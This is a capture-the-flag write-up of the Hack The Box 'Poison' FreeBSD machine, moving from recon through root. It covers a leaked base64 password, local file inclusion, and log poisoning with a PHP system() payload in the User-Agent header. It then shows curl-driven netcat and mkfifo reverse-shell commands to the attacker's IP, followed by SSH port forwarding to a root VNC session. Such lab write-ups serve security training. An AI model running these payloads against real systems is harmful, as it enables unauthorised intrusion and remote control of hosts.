Contents

🕵 HTB-Writeup : POISON

Recon

nmap x rustscan

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
└─$ rustscan -a 10.10.10.84 -b 10000 -- -A -Pn -sV -T5
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFLpOCLU3rRUdNNbb5u5WlP+JKUpoYw4znHe0n4mRlv5sQ5kkkZSDNMqXtfWUFzevPaLaJboNBOAXjPwd1OV1wL2YFcGsTL5MOXgTeW4ixpxNBsnBj67mPSmQSaWcudPUmhqnT5VhKYLbPk43FsWqGkNhDtbuBVo9/BmN+GjN1v7w54PPtn8wDd7Zap3yStvwRxeq8E0nBE4odsfBhPPC01302RZzkiXymV73WqmI8MeF9W94giTBQS5swH6NgUe4/QV1tOjTct/uzidFx+8bbcwcQ1eUgK5DyRLaEhou7PRlZX6Pg5YgcuQUlYbGjgk6ycMJDuwb2D5mJkAzN4dih
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKXh613KF4mJTcOxbIy/3mN/O/wAYht2Vt4m9PUoQBBSao16RI9B3VYod1HSbx3PYsPpKmqjcT7A/fHggPIzDYU=
|   256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJrg2EBbG5D2maVLhDME5mZwrvlhTXrK7jiEI+MiZ+Am
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

We are face of a FreeBSD machine :/ We have two open ports ssh & http.

Browsing to http://10.10.10.84/ we are face into a “temporary website” where we can test some php scripts.

drawing

The website list some pages:

  • ini.php
  • info.php: leak the machine name and the version FreeBSD 11.1-RELEASE
  • listfiles.php: leak a file pwdbackup.txt
  • phpinfo.php: leak php informations (php v5.6.32)

The pwdbackup.txt exposed a “secure” password that seems to be encoded with base64, 13 times according to the sentence.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

Passing the password into a b64 decoder, 13 times, we got the password Charix!2#4%6&8(0.

I first try to connect into the box using those credentials charix:Charix!2#4%6&8(0 into ssh, guessing that the first word in the password is the user and…

1
2
3
4
5

Welcome to FreeBSD!

charix@Poison:~ % cat /home/charix/user.txt 
**************************04209c

We got our first shell ! And the user flag :)

Path to the privesc

Local recon

In charix home directory we found a zip archive named secret.zip. It failed to decompress the file because it is password encrypted.

So I manage to do some bruteforce with john.

1
2
3
4
# get hash from zip2john
└─$ zip2john secret.zip > hash.txt

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt               

But it failed.

The, I run a scan using LinEnum to try to find some interesting things. But I can’t find any usefull information (crontab, running process, etc).

Thinking about logs

The box name is Poison, so it made me think of a famous vulnerability named log poisoning. Log poisoning consist in injecting malicious code into log files.

I manage to search into the log directory. I found a log named httpd-access.log. This, log all requests done to the webserver.

Indeed, we can find there our requests to http://10.10.10.84/browse.php:

1
2
3
4
5
6
charix@Poison:/var/log % tail httpd-access.log

10.10.16.7 - - [30/Aug/2022:00:09:42 +0200] "GET /browse.php?file=ini.php HTTP/1.1" 200 20456 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.16.7 - - [30/Aug/2022:00:09:44 +0200] "GET /browse.php?file=info.php HTTP/1.1" 200 157 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.16.7 - - [30/Aug/2022:00:09:46 +0200] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 192 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.16.7 - - [30/Aug/2022:00:10:11 +0200] "GET /browse.php?file=COUCOU HTTP/1.1" 200 357 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"

Now that we know that everything is logged, we can try to do some log poisoning.

Thanks to this article, I learn how we can manipulate logs to execute commands.

To do so, we need to have an access to the log file throught LFI.I check if a LFI is possible by retrieving a file through the form: http://10.10.10.84/browse.php?file=..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fhttpd-access.log

We are able to get the httpd-access.log file throught LFI.

drawing

Exploiting logs

With Burp, we intercept the webrequet to the log file (on http://10.10.10.84/browse.php?file=../../../../../var/log/httpd-access.log) and we replace User-Agent field by the payload below.

1
<?php system($_GET['cmd']); ?>
drawing

Then, we send the request. Our payload is now on the log file. We can check that our payload is working by sending commands throught it.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
# sending a 'ls -al' command
└─$ curl "http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls%20-al"

10.10.16.7 - - [30/Aug/2022:01:08:51 +0200] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log HTTP/1.1" 200 879 "-" "total 72
drwxr-xr-x  2 root  wheel   512 Mar 19  2018 .
drwxr-xr-x  6 root  wheel   512 Jan 24  2018 ..
-rw-r--r--  1 root  wheel    33 Jan 24  2018 browse.php
-rw-r--r--  1 root  wheel   289 Jan 24  2018 index.php
-rw-r--r--  1 root  wheel    27 Jan 24  2018 info.php
-rw-r--r--  1 root  wheel    33 Jan 24  2018 ini.php
-rw-r--r--  1 root  wheel    90 Jan 24  2018 listfiles.php
-rw-r--r--  1 root  wheel    20 Jan 24  2018 phpinfo.php
-rw-r--r--  1 root  wheel  1267 Mar 19  2018 pwdbackup.txt
"
10.10.16.7 - - [30/Aug/2022:01:09:05 +0200] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls%20-al HTTP/1.1" 200 1499 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"

It works! Let’s try to get a reverse shell. The LinEnum scan found that netcat command is available.

1
2
3
4
5
6
# Listen on Host
└─$ rlwrap nc -lvnp 4444

# try to get reverse shell using 'nc' then '/dev/tcp'
# /usr/bin/nc 10.10.16.7 4444 -e sh
└─$ curl "http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=/usr/bin/nc%2010.10.16.7%204444%20-e%20sh"

Sadly,it does not work. The PentestMonkey Cheatsheet provide a second method that can give a reverse shell if the basic one does not work.

1
2
3
# alternative netcat reverse shell
#rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4444 >/tmp/f
└─$ curl "http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.16.7%204444%20%3E/tmp/f"

And we got another shell with the www user.

1
2
3
4
5
6
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.84] 17534
sh: can't access tty; job control turned off
whoami
www

At this point, I can’t find anything usefull with that user. But it was cool to apply this technique.

Go back in time

I decide to go back and spend more time on the secret.zip archive found ealier. So I check if there are any active network connection.

I try a netstat -lnptu but some option are not present on FreeBSD. A rapid search and we find the equivalent in FreeBSD.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
# show listening connection
sockstat -l 

charix@Poison:~ % sockstat -l

USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS      
root     sendmail   653   3  tcp4   127.0.0.1:25          *:*
root     Xvnc       529   0  stream /tmp/.X11-unix/X1
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*

We found two potentially interesting command that are listening, sendmail & Xvnc. I first search for Xvnc vulnerabilities using searchsploit.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
# checking version
charix@Poison:/tmp % Xvnc -version
Xvnc version TightVNC-1.3.10


└─$ searchsploit TightVNC 
----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
----------------------------------------------------------------------- ---------------------------------
TightVNC - Authentication Failure Integer Overflow (PoC)               | windows/dos/8024.py
UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows  | windows/dos/7990.py
----------------------------------------------------------------------- ---------------------------------

We found an Integer Overflow! Let’s try the exploit!

Exploit Xvnc service

Unfortunately I was not able to exploit this vulnerability. I manage to get an access in local to the VNC service.

To do so, as the vnc server is running locally on the box, we can use ssh to port forward the server on our machine using the -L option.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
# From HOST 
└─$ ssh -L 5901:localhost:5901 charix@10.10.10.84

# From HOST
└─$ vncviewer localhost:5901                   
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Password: Charix!2#4%6&8(0
Authentication failed

We now have an access to VNC, I try to use the password that we have but we got an “Authentication failed”.

And then… 🤦‍♂️🤦‍♂️🤦‍♂️

The password of the archive would not be that of the user charix ?

1
2
3
4
└─$ unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password: Charix!2#4%6&8(0
 extracting: secret                  

Looking at the vncviewer, I found that we can use a file to authenticate.

1
2
3
4
5
6
└─$ vncviewer localhost:5901 -passwd secret
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"

We get a root shell, we can get the flag :)

drawing

Tags

Log Poisoning, FreeBSD, Easy, External, Apache, Penetration Tester Level 1, Local File Inclusion, A08:2021-Software And Data Integrity Failures, Use Of Injection Attacks, VNC, Confidentiality, Weak Authentication, Network, Password Reuse, Tunneling, Port Forwarding